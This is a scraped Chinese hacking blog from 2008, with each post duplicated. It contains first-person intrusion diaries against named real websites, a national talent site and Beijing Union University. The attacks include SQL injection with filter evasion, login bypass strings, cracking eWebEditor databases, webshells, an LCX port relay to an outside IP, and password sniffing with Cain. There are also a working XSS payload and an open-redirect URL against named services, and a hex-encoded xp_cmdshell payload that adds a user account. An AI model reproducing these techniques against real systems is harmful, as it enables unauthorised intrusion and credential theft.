26
Dec.2008
作者:SpookZanG
最近因为期末,上线时间较少,导致无法更新博客,这给垃圾留言增加了机会,虽然我开启了BOBLOG默认的验证码,不过垃圾留言还是能写上。
于是,找来了一款汉字验证码。
因为学习紧张,所以很少上线,制作时间仓促,难免不完美。不过在本人博客上测试成功。
使用方法:
先备份INC文件夹下的securitycode.php文件。切记,一定要备份!!
然后把压缩包里的securitycode.php和heiti.ttf上传至INC文件夹下,覆盖原文件。
最后刷新缓存、清空临时文件夹。
heiti.ttf可以换成喜欢的字体。我用的是方正超粗黑简体。
下载文件
最近因为期末,上线时间较少,导致无法更新博客,这给垃圾留言增加了机会,虽然我开启了BOBLOG默认的验证码,不过垃圾留言还是能写上。
于是,找来了一款汉字验证码。
因为学习紧张,所以很少上线,制作时间仓促,难免不完美。不过在本人博客上测试成功。
使用方法:
先备份INC文件夹下的securitycode.php文件。切记,一定要备份!!
然后把压缩包里的securitycode.php和heiti.ttf上传至INC文件夹下,覆盖原文件。
最后刷新缓存、清空临时文件夹。
heiti.ttf可以换成喜欢的字体。我用的是方正超粗黑简体。
下载文件
22
Nov.2008
St4nd & SpookZanG[S.C.T]
话说,在这秋高气爽,秋风瑟瑟,秋风送暖,秋阳杲杲(杲字你们不认识吧?哈哈哈哈哈哈哈)的日子里,我感觉应该为建设和谐社会,建立和谐社区,维护世
界和平,神9探月旅行,做点贡献,于是来到了中国国家人才网。话说这个网可不简单,是“人事部全国人才流动中心主办”的!这个中心一定非常的NB,因为我
没有听说过。
打开网站,发现网站是JSP的。随便打开一个连接,把它扔到穿山甲里,发现是SA的注入点!我感觉JSP搭配MSSQL的比较少见,我到是经常见到JSP+Oracle的。
于是乎我非常高兴,在脑子里闪现出了无数的提权方法:执行命令拉,下载文件拉(SA权限能下载一个不大于8k的文件),写入VBS拉。等等等等。
但是呢,事情往往没有我想的那么简单。首先呢,他是内网,没法从外网连接3389,其次,这个SA不是显错模式,搞起来就比较烦人了,后期列目录,列表明啥的都得一个一个的猜,麻烦!费时!可是我是谁呢,我于是打算找个人来一起搞,先叫33,33说他在拍片,忙!又叫Demon和小T,他们都说我没接触过JSP,让我找33(你们不会是商量好的吧?)。最后终于st4nd的出现,解救了我。跟他打招呼完毕后,问他搞站么,他说搞。于是把网站注入点发了过去。
之后,我发现了一个备份网站的路径,找到了另一套程序,http://www.newjobs.com.cn/city_manager/ ,于是我抱着试一试的心态,输入'or'='or',但是呢,不成功,返回了500错误。我感觉那个后台的确是能绕开的,没有过滤。于是乎,换成了'or''=',正常进入。
有在里面发现了ewebeditor,http://www.newjobs.com.cn//tools/ewebeditor/,似乎胜利在向我招手。但是呢,事情网网没有我想的那么简单,通过列那个备份目录发现,他根本没有登录页面,而且他这个ewebeditor全是HTML的,真烦人啊!!(他貌似有个上传的页面,但是我打开是500错误……)
这时,st4nd发来了一个“resin-3.1.5”,这个东西是什么呢?Resin是CAUCHO公司(http://www.caucho.com/)的产品,是一个非常流行的支持servlets 和jsp的引擎,速度非常快。
而在resin-3.1.5下的conf\resin.conf很可能存放着网站的路径,于是找到这个文件,拿出穿山甲,读了出来。
虽然最后没有找到路径,不过找到了SA的密码(为了防止被一些不法分子轻松利用,密码隐藏,想要自己去读。):
虽然有了SA的密码,但是因为是内网,无法从外部连接。所以要用剑心写的那个web mssql连接器去搞。但是因为没有路径所以也就放置了。
因为找不到路径,st4nd就说应该用VBS提权,我感觉服务器上如果有杀软的话,VBS提权的成功率很低的。在尝试了一下后,发现服务器上果然有杀软,写上去的VBS被干掉。
到学校的第2天,st4nd发来了消息,说找到路径了,通过备份数据库弄上去了马,不过据说杀软很强大(后来知道,原来是JB金山毒霸2008)。
并给我下了最后通牒,搞下他,渗透服务器!
接到st4nd的命令,我快马加鞭,倍道而进,风驰电掣,大步流星,奔逸绝尘的回了家,打开电脑,连上shell,这个shell是JSP的,33写的,通过33的马,把自己的马弄上去,进入!
2008-11-22 10:48
还记得那个SA的密码么? 通过他连接!
2008-11-22 10:48
因为内网,打算上传个LCX反弹出来3389,提权。
但是呢,有杀软,弄不上去……33说他有免杀的LCX。33把LCX给我之后,我发现竟然被杀?!
我打算结束掉那个破B金山杀毒,但是失败了。
真是郁闷… …看来最近得恶补一下免杀了……
文章先发上来把,谁有能免杀的LCX或者反弹马说下,好拿下他,渗透之…….
最后说下,躺谢,趴谢,打滚谢st4nd的鼎力支持。
话说,在这秋高气爽,秋风瑟瑟,秋风送暖,秋阳杲杲(杲字你们不认识吧?哈哈哈哈哈哈哈)的日子里,我感觉应该为建设和谐社会,建立和谐社区,维护世
界和平,神9探月旅行,做点贡献,于是来到了中国国家人才网。话说这个网可不简单,是“人事部全国人才流动中心主办”的!这个中心一定非常的NB,因为我
没有听说过。
打开网站,发现网站是JSP的。随便打开一个连接,把它扔到穿山甲里,发现是SA的注入点!我感觉JSP搭配MSSQL的比较少见,我到是经常见到JSP+Oracle的。
于是乎我非常高兴,在脑子里闪现出了无数的提权方法:执行命令拉,下载文件拉(SA权限能下载一个不大于8k的文件),写入VBS拉。等等等等。
但是呢,事情往往没有我想的那么简单。首先呢,他是内网,没法从外网连接3389,其次,这个SA不是显错模式,搞起来就比较烦人了,后期列目录,列表明啥的都得一个一个的猜,麻烦!费时!可是我是谁呢,我于是打算找个人来一起搞,先叫33,33说他在拍片,忙!又叫Demon和小T,他们都说我没接触过JSP,让我找33(你们不会是商量好的吧?)。最后终于st4nd的出现,解救了我。跟他打招呼完毕后,问他搞站么,他说搞。于是把网站注入点发了过去。
之后,我发现了一个备份网站的路径,找到了另一套程序,http://www.newjobs.com.cn/city_manager/ ,于是我抱着试一试的心态,输入'or'='or',但是呢,不成功,返回了500错误。我感觉那个后台的确是能绕开的,没有过滤。于是乎,换成了'or''=',正常进入。
有在里面发现了ewebeditor,http://www.newjobs.com.cn//tools/ewebeditor/,似乎胜利在向我招手。但是呢,事情网网没有我想的那么简单,通过列那个备份目录发现,他根本没有登录页面,而且他这个ewebeditor全是HTML的,真烦人啊!!(他貌似有个上传的页面,但是我打开是500错误……)
这时,st4nd发来了一个“resin-3.1.5”,这个东西是什么呢?Resin是CAUCHO公司(http://www.caucho.com/)的产品,是一个非常流行的支持servlets 和jsp的引擎,速度非常快。
而在resin-3.1.5下的conf\resin.conf很可能存放着网站的路径,于是找到这个文件,拿出穿山甲,读了出来。
虽然最后没有找到路径,不过找到了SA的密码(为了防止被一些不法分子轻松利用,密码隐藏,想要自己去读。):
<database>
<jndi-name>jdbc/mysql</jndi-name>
<driver type="com.microsoft.jdbc.sqlserver.SQLServerDriver">
<url>jdbc:microsoft:sqlserver://localhost:1433</url>
<user>sa</user>
<password>XXXXXXX</password>
</driver>
<prepared-statement-cache-size>8</prepared-statement-cache-size>
<max-connections>20</max-connections>
<max-idle-time>30s</max-idle-time>
</database>
<jndi-name>jdbc/mysql</jndi-name>
<driver type="com.microsoft.jdbc.sqlserver.SQLServerDriver">
<url>jdbc:microsoft:sqlserver://localhost:1433</url>
<user>sa</user>
<password>XXXXXXX</password>
</driver>
<prepared-statement-cache-size>8</prepared-statement-cache-size>
<max-connections>20</max-connections>
<max-idle-time>30s</max-idle-time>
</database>
虽然有了SA的密码,但是因为是内网,无法从外部连接。所以要用剑心写的那个web mssql连接器去搞。但是因为没有路径所以也就放置了。
因为找不到路径,st4nd就说应该用VBS提权,我感觉服务器上如果有杀软的话,VBS提权的成功率很低的。在尝试了一下后,发现服务器上果然有杀软,写上去的VBS被干掉。
到学校的第2天,st4nd发来了消息,说找到路径了,通过备份数据库弄上去了马,不过据说杀软很强大(后来知道,原来是JB金山毒霸2008)。
并给我下了最后通牒,搞下他,渗透服务器!
接到st4nd的命令,我快马加鞭,倍道而进,风驰电掣,大步流星,奔逸绝尘的回了家,打开电脑,连上shell,这个shell是JSP的,33写的,通过33的马,把自己的马弄上去,进入!
2008-11-22 10:48
还记得那个SA的密码么? 通过他连接!
2008-11-22 10:48
因为内网,打算上传个LCX反弹出来3389,提权。
但是呢,有杀软,弄不上去……33说他有免杀的LCX。33把LCX给我之后,我发现竟然被杀?!
我打算结束掉那个破B金山杀毒,但是失败了。
真是郁闷… …看来最近得恶补一下免杀了……
文章先发上来把,谁有能免杀的LCX或者反弹马说下,好拿下他,渗透之…….
最后说下,躺谢,趴谢,打滚谢st4nd的鼎力支持。
1
Nov.2008
作者:SpookZanG[D.R.T]
利用方法:
http://vid.atm.youku.com/htmlclick?p=22&ca=4617&ie=4598&k=&u=http://www.spookzang.net
把http://www.spookzang.net 换成你的网站即可。
利用方法:
http://vid.atm.youku.com/htmlclick?p=22&ca=4617&ie=4598&k=&u=http://www.spookzang.net
把http://www.spookzang.net 换成你的网站即可。
24
Oct.2008
作者:SpookZanG
刚开始认为非常的垃圾,几乎没有利用价值。
http://login.xiaonei.com/Login.do?origURL=http://abc.xiaonei.com/knowabc/investigation/VotingAdd.do
只是认为把URL后面的网址换成你,然后登录跳转。
但是,往下一弄,发现能弹框框。
http://login.xiaonei.com/Login.do?origURL="><script>alert("SpookZanG")</script><"
这样。
感谢刘同学大半夜不睡觉,给我发来的投票广告,……而且是限女生的投票广告.....
刚开始认为非常的垃圾,几乎没有利用价值。
http://login.xiaonei.com/Login.do?origURL=http://abc.xiaonei.com/knowabc/investigation/VotingAdd.do
只是认为把URL后面的网址换成你,然后登录跳转。
但是,往下一弄,发现能弹框框。
http://login.xiaonei.com/Login.do?origURL="><script>alert("SpookZanG")</script><"
这样。
感谢刘同学大半夜不睡觉,给我发来的投票广告,……而且是限女生的投票广告.....
18
Oct.2008
作者:SpookZanG[D.R.T]
话说,秋天到了,天气凉了,在这收获的季节,在这金秋,我们可爱的母校迎来了三十年的校庆,这是一个美丽的季节。我们学校又组织我们去了国家体育馆,虽然我不想去,可是学校利用学分威逼利诱,没有办法,只好去了。但是,这不是我的主观意愿,所以……我要为学校在这三十年校庆之际,献上一份“厚礼”。
先打开主页http://www.buu.edu.cn/,哇,好“漂亮”的网页,先探测探测吧。随便找个连接,点开,http://www.buu.edu.cn/home/gg/news_con.jsp?fid=sph20080902111726756
在后面,分别加上 ' ,and 1=1 , and 1=2。 发现有注入漏洞。
看样子貌似是Orcale数据库。本打算猜一下密码和表段啥的,可是看到他简陋的页面可以断定,后台更简陋。很可能只能跨站啥的,连上传都没有。(其实开始猜解数据库了,可是每当猜解到一半,服务器上的数据库就会出错,所以就没有继续搞。)
正所谓条条大路通罗马,(至于这句话什么意思,不明白的也不必深究,因为跟入侵没关系)我们来看看别的页面。
我们打开http://news.buu.com.cn/,在搜索那里随便搜索点东西,我搜索的是3434,本来还以为得抓包,然后构造连接,但是我发现,他是直接显示的,不用构造。
http://news.buu.com.cn/xmllist/search_news.asp?newskey=3434&mtype=0&selectf=0&Submit22=%CB%D1%CB%F7
我们把 3434后面的都删除,发现删除后不能正常显示,没关系,我们还可以这样构造,把“newskey=3434”放到最后面,弄成这样:
http://news.buu.com.cn/xmllist/search_news.asp?mtype=0&selectf=0&Submit22=%CB%D1%CB%F7&newskey=3434
然后,在后门加上单引号',出现
发现,他有防注入程序,但是呢……,他的防注入是不是会有漏洞呢?我们把newskey换成URL格式%6E%65%77%73%6B%65%79,
然后在尝试提交' and 1=1 and 1=2,发现有注入漏洞!是DB权限,DB权限,可以通过备份得到一句话。
可是我们不知道他的路径,这怎么办呢?
我一边猜解着表名,一边查找着后台,在尝试到http://news.buu.com.cn/main.asp发现他有一个探针,显示出了路径,看来我拿到权限有望了!
把有注入的连接扔到穿山甲里,然后通过穿山甲备份数据库,但是失败了……看来这条路走不通了。(后来手工检测的时候,发现是PB权限,所以无法备份得到shell,所以说,不能太相信软件!)
正所谓条条大路通罗马,(至于这句话什么意思,不明白的也不必深究,因为跟入侵没关系)这条不成,还有别的呢~在看看别的分站。
最后来到了http://ldxsc.buu.com.cn/,我发现他似乎有EWEBEDITOR。
我在后面输入EDIT,发现出现了403错误,看来联大似乎离死不远了……
我输入http://ldxsc.buu.com.cn/taiyanyuan/edit/admin_login.asp,出现了传说中的页面,我密码尝试admin admin888 admin999。
发现都无法登入,没关系,把数据库down下来,然后破解就OK了,输入默认的数据库,db/ewebeditor.mdb,把数据库down下来,然后拿着破解的密码登录,成功!
然后通过ewebeditor的老方法拿到了webshell。
然后在服务器里进行地毯式搜查,发现他的D,E,F盘都是分站。
最后在E盘里的一个ASPX网站发现了一个有SA的帐号(Maxil发现的,我至今没有找到-_-||)
拿着SA的帐号,通过WEB版的SQL登录器登录(因为是内网,外面连不上)。成功,并且发现组件齐全。
然后执行命令netstat -an看看他都开了啥端口。
发现有3389.因为是内网,所以从外网是连不上的,但是我们可以利用LCX来帮忙。(本来打算上传个反弹的马马的但是无奈于我对于免杀这块的技术空白……所有上传的马全被可爱的卡巴给删除了。在废句话,最后拿下的时候,本想把C盘填入卡巴的可信区域,【填入可信区域,卡巴就不会扫描他拉~】,然后留个后门,弄个反弹木马啥的,但……但……但……他的卡巴竟然设了密码!!真是……唉……)
我把LCX上传上去,先在本地执行 (LCX -LISTEN 接收数据端口 转向端口)LCX -LISTEN X Y,并在WEB版SQL里执行(LCX的格式LCX的地址 -slave 你的IP 你接收的端口 他的IP 他的端口)E:\lcx.exe -slave 219.x.x.90 x 10.11.6.16 3389。
然后我用远程桌面连接127.0.0.1:Y(Y的端口不要用3389).
成功!
最后就是上传一个CAIN进行嗅探,等待着密码的降临……
写在最后:本文没有任何技术,此文是一篇入侵笔记,记录我在入侵时遇到的困难、问题以及我解决的方法。
如果本文哪里写的有错误或者有更好的方法,欢迎指出。
话说,秋天到了,天气凉了,在这收获的季节,在这金秋,我们可爱的母校迎来了三十年的校庆,这是一个美丽的季节。我们学校又组织我们去了国家体育馆,虽然我不想去,可是学校利用学分威逼利诱,没有办法,只好去了。但是,这不是我的主观意愿,所以……我要为学校在这三十年校庆之际,献上一份“厚礼”。
先打开主页http://www.buu.edu.cn/,哇,好“漂亮”的网页,先探测探测吧。随便找个连接,点开,http://www.buu.edu.cn/home/gg/news_con.jsp?fid=sph20080902111726756
在后面,分别加上 ' ,and 1=1 , and 1=2。 发现有注入漏洞。
看样子貌似是Orcale数据库。本打算猜一下密码和表段啥的,可是看到他简陋的页面可以断定,后台更简陋。很可能只能跨站啥的,连上传都没有。(其实开始猜解数据库了,可是每当猜解到一半,服务器上的数据库就会出错,所以就没有继续搞。)
正所谓条条大路通罗马,(至于这句话什么意思,不明白的也不必深究,因为跟入侵没关系)我们来看看别的页面。
我们打开http://news.buu.com.cn/,在搜索那里随便搜索点东西,我搜索的是3434,本来还以为得抓包,然后构造连接,但是我发现,他是直接显示的,不用构造。
http://news.buu.com.cn/xmllist/search_news.asp?newskey=3434&mtype=0&selectf=0&Submit22=%CB%D1%CB%F7
我们把 3434后面的都删除,发现删除后不能正常显示,没关系,我们还可以这样构造,把“newskey=3434”放到最后面,弄成这样:
http://news.buu.com.cn/xmllist/search_news.asp?mtype=0&selectf=0&Submit22=%CB%D1%CB%F7&newskey=3434
然后,在后门加上单引号',出现
发现,他有防注入程序,但是呢……,他的防注入是不是会有漏洞呢?我们把newskey换成URL格式%6E%65%77%73%6B%65%79,
然后在尝试提交' and 1=1 and 1=2,发现有注入漏洞!是DB权限,DB权限,可以通过备份得到一句话。
可是我们不知道他的路径,这怎么办呢?
我一边猜解着表名,一边查找着后台,在尝试到http://news.buu.com.cn/main.asp发现他有一个探针,显示出了路径,看来我拿到权限有望了!
把有注入的连接扔到穿山甲里,然后通过穿山甲备份数据库,但是失败了……看来这条路走不通了。(后来手工检测的时候,发现是PB权限,所以无法备份得到shell,所以说,不能太相信软件!)
正所谓条条大路通罗马,(至于这句话什么意思,不明白的也不必深究,因为跟入侵没关系)这条不成,还有别的呢~在看看别的分站。
最后来到了http://ldxsc.buu.com.cn/,我发现他似乎有EWEBEDITOR。
我在后面输入EDIT,发现出现了403错误,看来联大似乎离死不远了……
我输入http://ldxsc.buu.com.cn/taiyanyuan/edit/admin_login.asp,出现了传说中的页面,我密码尝试admin admin888 admin999。
发现都无法登入,没关系,把数据库down下来,然后破解就OK了,输入默认的数据库,db/ewebeditor.mdb,把数据库down下来,然后拿着破解的密码登录,成功!
然后通过ewebeditor的老方法拿到了webshell。
然后在服务器里进行地毯式搜查,发现他的D,E,F盘都是分站。
最后在E盘里的一个ASPX网站发现了一个有SA的帐号(Maxil发现的,我至今没有找到-_-||)
拿着SA的帐号,通过WEB版的SQL登录器登录(因为是内网,外面连不上)。成功,并且发现组件齐全。
然后执行命令netstat -an看看他都开了啥端口。
发现有3389.因为是内网,所以从外网是连不上的,但是我们可以利用LCX来帮忙。(本来打算上传个反弹的马马的但是无奈于我对于免杀这块的技术空白……所有上传的马全被可爱的卡巴给删除了。在废句话,最后拿下的时候,本想把C盘填入卡巴的可信区域,【填入可信区域,卡巴就不会扫描他拉~】,然后留个后门,弄个反弹木马啥的,但……但……但……他的卡巴竟然设了密码!!真是……唉……)
我把LCX上传上去,先在本地执行 (LCX -LISTEN 接收数据端口 转向端口)LCX -LISTEN X Y,并在WEB版SQL里执行(LCX的格式LCX的地址 -slave 你的IP 你接收的端口 他的IP 他的端口)E:\lcx.exe -slave 219.x.x.90 x 10.11.6.16 3389。
然后我用远程桌面连接127.0.0.1:Y(Y的端口不要用3389).
成功!
最后就是上传一个CAIN进行嗅探,等待着密码的降临……
写在最后:本文没有任何技术,此文是一篇入侵笔记,记录我在入侵时遇到的困难、问题以及我解决的方法。
如果本文哪里写的有错误或者有更好的方法,欢迎指出。
29
Sep.2008
感觉这个思路不错,拿来分享。
来源:网络
我想不少人都看过一些关于SQL Injection针对SQL Server攻击的文章,都是因为变量过滤不足甚至没有过滤而构造畸形SQL语句注入的,包括我写的那篇《SQL Injection的实现与应用》也是这样的例子,因为没有碰到任何的过滤,所以使我们相当轻松就注入成功了,如下:
http://www.spookzang.net/show.asp?id=1;exec master.dbo.xp_cmdshell 'net user angel pass /add';--
这往往给大家造成误解,认为只要变量过滤了'就可以防止SQL Injection攻击,这种意识为大量程序可以注入埋下祸根,其实仅仅过滤'是不够的,在'被过滤的情况下我们照样玩,看下面语句:
http://www.spookzang.net/show.asp?id=1;declare @a sysname select @a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400 exec master.dbo.xp_cmdshell @a;--
是不是跟上面的那句有很大区别?可是效果完全是一样的。其实这些都是SQL语句。
0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400
这句是“net user angel pass /add”的16进制格式。了解SQL的朋友就容易明白,先声明一个变量a,然后把我们的指令赋值给a,然后调用变量a最终执行我们输入的命令。变量a可以是任何命令。如下:
declare @a sysname
select @a=
exec master.dbo.xp_cmdshell @a
解决办法:
过滤变量,限制只允许输入特定字符。比如对于数字类型的变量就限制只能输入数字类型的数据。具体就不说了。这完全是程序作者自由发挥了。
来源:网络
我想不少人都看过一些关于SQL Injection针对SQL Server攻击的文章,都是因为变量过滤不足甚至没有过滤而构造畸形SQL语句注入的,包括我写的那篇《SQL Injection的实现与应用》也是这样的例子,因为没有碰到任何的过滤,所以使我们相当轻松就注入成功了,如下:
http://www.spookzang.net/show.asp?id=1;exec master.dbo.xp_cmdshell 'net user angel pass /add';--
这往往给大家造成误解,认为只要变量过滤了'就可以防止SQL Injection攻击,这种意识为大量程序可以注入埋下祸根,其实仅仅过滤'是不够的,在'被过滤的情况下我们照样玩,看下面语句:
http://www.spookzang.net/show.asp?id=1;declare @a sysname select @a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400 exec master.dbo.xp_cmdshell @a;--
是不是跟上面的那句有很大区别?可是效果完全是一样的。其实这些都是SQL语句。
0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400
这句是“net user angel pass /add”的16进制格式。了解SQL的朋友就容易明白,先声明一个变量a,然后把我们的指令赋值给a,然后调用变量a最终执行我们输入的命令。变量a可以是任何命令。如下:
declare @a sysname
select @a=
exec master.dbo.xp_cmdshell @a
解决办法:
过滤变量,限制只允许输入特定字符。比如对于数字类型的变量就限制只能输入数字类型的数据。具体就不说了。这完全是程序作者自由发挥了。
